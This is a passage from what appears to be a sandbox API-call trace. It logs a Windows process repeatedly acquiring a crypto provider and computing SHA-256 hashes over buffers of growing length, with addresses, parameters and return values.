| out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.348] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b650, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b650, pdwDataLen=0x1ee448) returned 1 [0262.348] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.348] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.348] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.348] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.348] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0262.348] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.348] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b680, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b680, pdwDataLen=0x1ee448) returned 1 [0262.348] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.348] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.348] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.349] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.349] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0262.349] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.349] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b6b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b6b0, pdwDataLen=0x1ee448) returned 1 [0262.349] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.349] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.349] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.350] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.350] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0262.350] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.350] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b6e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b6e0, pdwDataLen=0x1ee448) returned 1 [0262.350] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.350] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.350] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.351] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.351] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0262.351] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.351] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b710, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b710, pdwDataLen=0x1ee448) returned 1 [0262.351] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.351] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.351] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.352] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.352] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0262.352] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.352] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b740, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b740, pdwDataLen=0x1ee448) returned 1 [0262.352] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.352] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.352] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.352] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.353] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0262.353] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.353] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b770, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b770, pdwDataLen=0x1ee448) returned 1 [0262.353] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.353] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.353] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.353] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.353] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0262.353] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.353] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b7a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b7a0, pdwDataLen=0x1ee448) returned 1 [0262.353] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.354] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.354] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.354] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.354] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0262.354] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.354] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b7d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b7d0, pdwDataLen=0x1ee448) returned 1 [0262.354] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.354] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.354] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.355] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.355] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0262.355] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.355] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b800, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b800, pdwDataLen=0x1ee448) returned 1 [0262.355] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.355] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.355] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.356] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.356] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0262.356] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.356] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b830, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b830, pdwDataLen=0x1ee448) returned 1 [0262.356] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.356] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.356] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.357] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.357] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0262.357] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.357] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b860, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b860, pdwDataLen=0x1ee448) returned 1 [0262.357] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.357] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.357] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.358] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.358] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x20, dwFlags=0x0) returned 1 [0262.358] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.358] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b890, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b890, pdwDataLen=0x1ee448) returned 1 [0262.358] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.358] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.358] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.359] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.359] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x40, dwFlags=0x0) returned 1 [0262.359] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.359] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b8c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b8c0, pdwDataLen=0x1ee448) returned 1 [0262.359] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.359] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.359] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.360] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.360] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x60, dwFlags=0x0) returned 1 [0262.360] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.360] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b8f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b8f0, pdwDataLen=0x1ee448) returned 1 [0262.360] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.360] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.360] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.360] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.360] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x80, dwFlags=0x0) returned 1 [0262.360] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.360] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b920, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b920, pdwDataLen=0x1ee448) returned 1 [0262.360] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.361] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.361] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.361] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.361] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0262.361] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.361] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b950, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b950, pdwDataLen=0x1ee448) returned 1 [0262.361] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.361] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.361] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.362] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.362] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0262.362] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.362] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b980, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b980, pdwDataLen=0x1ee448) returned 1 [0262.362] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.362] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.362] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.363] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.363] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0262.363] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.363] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31b230, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31b230, pdwDataLen=0x1ee448) returned 1 [0262.363] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.363] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.363] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.364] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.364] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x100, dwFlags=0x0) returned 1 [0262.364] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.364] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ba00, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ba00, pdwDataLen=0x1ee448) returned 1 [0262.364] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.364] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.364] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.364] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.364] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x120, dwFlags=0x0) returned 1 [0262.364] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.365] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ba60, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ba60, pdwDataLen=0x1ee448) returned 1 [0262.365] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.365] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.365] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.365] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.365] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x140, dwFlags=0x0) returned 1 [0262.365] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.365] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31ba90, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31ba90, pdwDataLen=0x1ee448) returned 1 [0262.365] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.365] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.365] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.366] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.366] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x160, dwFlags=0x0) returned 1 [0262.366] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.366] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bac0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bac0, pdwDataLen=0x1ee448) returned 1 [0262.366] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.366] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.366] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.367] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.367] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x180, dwFlags=0x0) returned 1 [0262.367] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.367] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31baf0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31baf0, pdwDataLen=0x1ee448) returned 1 [0262.367] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.367] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.367] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.368] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.368] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0262.368] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.368] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bb20, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bb20, pdwDataLen=0x1ee448) returned 1 [0262.368] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.368] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.368] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.369] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.369] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0262.369] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.369] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bb50, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bb50, pdwDataLen=0x1ee448) returned 1 [0262.369] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.369] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.369] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.369] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.369] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0262.369] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.369] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bb80, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bb80, pdwDataLen=0x1ee448) returned 1 [0262.370] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.370] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.370] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.370] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.370] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x200, dwFlags=0x0) returned 1 [0262.370] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.370] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x31bbb0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x31bbb0, pdwDataLen=0x1ee448) returned 1 [0262.370] CryptDestroyHash 